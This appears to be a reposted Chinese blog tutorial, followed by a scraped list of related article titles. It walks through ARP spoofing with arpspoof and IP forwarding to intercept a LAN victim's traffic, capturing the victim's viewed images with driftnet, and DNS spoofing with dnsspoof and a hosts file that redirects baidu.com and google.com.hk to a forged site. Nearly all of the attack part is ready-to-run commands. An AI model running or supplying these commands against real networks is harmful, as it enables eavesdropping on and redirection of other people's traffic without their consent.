最近搞了一个监听神器,尽管使用了网卡混杂模式,不过监听到的几乎全是本地流量, 为了获取更多有用的数据,搞一下中间人攻击,最基本的就是arpspoof + IP转发,这样就可以获得局域网内任何人的上网流量, 难得的是实验室没有做ARP防护,给arpspoof一个大行其道的机会。

arpspoof

  1. 实战环境

  2. 攻击者(kali linux):10.10.10.1

  3. 攻击目标:10.10.10.2
  4. 默认网关:10.10.10.254

  5. 攻击步骤

首先在本地开启IP转发,否则很容易被发觉。

echo 1 >> /proc/sys/net/ipv4/ip_forward

用man arpspoof查看参数详细说明
首先跟10.10.10.2说我是网关10.10.10.254

arpspoof -i eth0 -t 10.10.10.2 10.10.10.254

然后跟网关10.10.10.254说我是10.10.10.2,完成双向欺骗

arpspoof -i eth0 -t 10.10.10.254 10.10.10.2

上面两条arpspoof指令可以用下面一个指令完成

arpspoof -i eth0 -t 10.10.10.2 -r 10.10.10.254

最后利用driftnet工具捕获并友好地显示10.10.10.2在网上浏览的图片

driftnet -i eth0

REF

dnsspoof

  1. 攻击环境

  2. 攻击者(kali linux):10.10.10.1

  3. 攻击目标:10.10.10.2
  4. 默认网关:10.10.10.254
  5. DNS服务器: 8.8.8.8
  6. 伪造网站: 10.10.10.3

  7. 攻击步骤

先进行arp欺骗,以中转攻击目标的所有上网流量

echo 1 >> /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 10.10.10.2 10.10.10.254
arpspoof -i eth0 -t 10.10.10.254 10.10.10.2

按照hosts文件格式,创建一个dnsspoof.hosts文件, 当受害者请求该文件中的域名解析时,我们就返回给他一个伪造的IP地址,让其访问我们伪造的网站。

cat dnsspoof.hosts
10.10.10.3 .baidu.com
10.10.10.3
.google.com.hk

执行dnsspoof, -f指定hosts文件,host 10.10.10.2 and udp port 53 遵从tcpdump流量过滤规则

dnsspoof -i eth0 -f dnsspoof.hosts host 10.10.10.2 and udp port 53

这样当攻击目标10.10.10.2访问baidu.com或者google.com.hk时,受害者访问的实际上是10.10.10.3指定的网站。

通过抓包分析,dnsspoof的原理如下

由于DNS协议使用是传输层协议是UDP协议, 这样无需像TCP那样建立连接就可以轻松的伪造应答包,包括源IP. 10.10.10.2发送DNS 查询包问DNS服务器www.baidu.com的IP地址是多少? 10.10.10.1装作DNS服务器(伪造IP)向攻击目标发送一个DNS响应包说www.baidu.com的IP地址是10.10.10.3。

转载于:https://www.cnblogs.com/reddusty/p/4826660.html

arpspoof dnsspoof中间人攻击相关推荐

  1. [web安全]使用ARPspoof进行中间人(MiTM)攻击

    上次发现的arpspoof,这次来研究了,记录了点东西,方便以后查阅. 中间人攻击: 坏人将自己置于服务器和客户端之间,从而可以访问呢两者之间的所有流量,方便窃听等干坏事. ARPspoof: ARP ...

  2. 中间人攻击(ARPspoof)

    中间人攻击(ARPspoof) 1.介绍: 中间人攻击(Man-in-the-MiddleAttack,简称"MITM攻击")是一种"间接"的入侵攻击,这种攻击 ...

  3. SSH V2的中间人攻击

    SSH V2的中间人攻击 2012-12-19 10:48:52     我来说两句       作者:Dis9Team 收藏    我要投稿 中间人攻击(Man-in-the-MiddleAttac ...

  4. SSL/TLS中间人攻击

    准备:kali.xp kali ip:192.168.14.157 目标ip:192.168.14.158 目标网关:192.168.14.2 使用工具:ettercap.sslstrip.arpsp ...

  5. Kali Linux Web 渗透测试秘籍 第八章 中间人攻击

    第八章 中间人攻击 作者:Gilberto Najera-Gutierrez 译者:飞龙 协议:CC BY-NC-SA 4.0 简介 中间人(MITM)攻击是一种攻击类型,其中攻击者将它自己放到两方之 ...

  6. android客户端中间人攻击,Android 中间人攻击

    0x00 Android中间人攻击的思路就是劫持局域网中被攻击机器和服务器间的对话.被攻击机器和服务器表面上工作正常,实际上已经被中间人劫持.可以从一张图来明白这个过程. 受攻击主机发送的数据,首先经 ...

  7. 网络嗅探与欺骗----函数sniff()、ARP的原理、ARP欺骗、AARP欺骗的中间人攻击

    网络嗅探与欺骗 如果想要彻底了解一个网络,那么最好的办法就是对网络中的流量进行嗅探 嗅探工具可以用来窃取网络中明文传输的密码,监视网络中的数据流向,甚至可以收集远程登录所使用的NTLM数据包(这个数据 ...

  8. SSH协议弱加密算法漏洞的利用及复现(中间人攻击)

    SSH协议弱加密算法漏洞的利用及复现(中间人攻击) SSH协议弱加密算法漏洞的利用及复现(中间人攻击) 很多服务器或者交换机是存在SSH协议弱加密算法漏洞的,但是该漏洞如何利用呢?最近研究了下此漏洞的 ...

  9. HTTPS中间人攻击实验

    HTTPS中间人攻击实验 一.实验基础 1.HTTPS概述 HTTPS (全称: Hyper Text Transfer Protocol over SecureSocketLayer), 是以安全为 ...

最新文章

  1. “惊群”,看看nginx是怎么解决它的
  2. mysql怎么执行任务_Mysql怎么定时执行任务
  3. 2.API的调用过程(3环进0环)
  4. Gentoo 安装日记 01 (工具准备)
  5. OpenCV放大图像:多输出
  6. 洛谷 - P4556 [Vani有约会]雨天的尾巴 /【模板】线段树合并(树上差分+线段树合并)
  7. MySQL无法重启问题解决Warning: World-writable config file '/etc/my.cnf' is ignored
  8. PDF转换技巧之如何把文件转换为WPS?
  9. c语言 单片机模拟,【51单片机】普通I/O口模拟SPI口C语言程序
  10. oracle批量更新之使用游标进行分批次更新的5种方式及速度比对
  11. 【USACO 4.3.2】质数方阵
  12. python re包_使用Python中的re包将句子分成子句
  13. 怎样将树的中序遍历的数输入到一个数组中_二叉搜索树的后序遍历序列(剑指offer第三十一天)...
  14. python之web编程
  15. java 缓存 框架_5个常用的Java分布式缓存框架
  16. 正负数据如何归一化_数据标准化period;归一化处理
  17. 怎么理解幂等性[或者http幂等性]
  18. 用vmware安装雨林木风虚拟机系统的坑
  19. FLOPS、TOPS和FLOPs的区别
  20. 关于苹果支付ApplePay的一些个人总结

热门文章

  1. vijos 新年趣事之打牌
  2. http://www.cocoachina.com/ios/20150907/13339.html
  3. 科大讯飞语音识别C++版本SDK集成测试的一些问题,工具VS+QT
  4. C语言:将邻接表转换成邻接矩阵算法
  5. 计算机怎样在表格中画正字,excel表格里怎样做艺术字-Excel艺术字怎么在文字下面...
  6. 《Android 应用案例开发大全(第二版)》——2.2节壁纸策划及准备工作
  7. javaScript实现倒计时功能
  8. Solidity 中 transfer、send、call的区别
  9. TIFF图像文件(一):文件结构
  10. 开机广告,智能电视的二次战争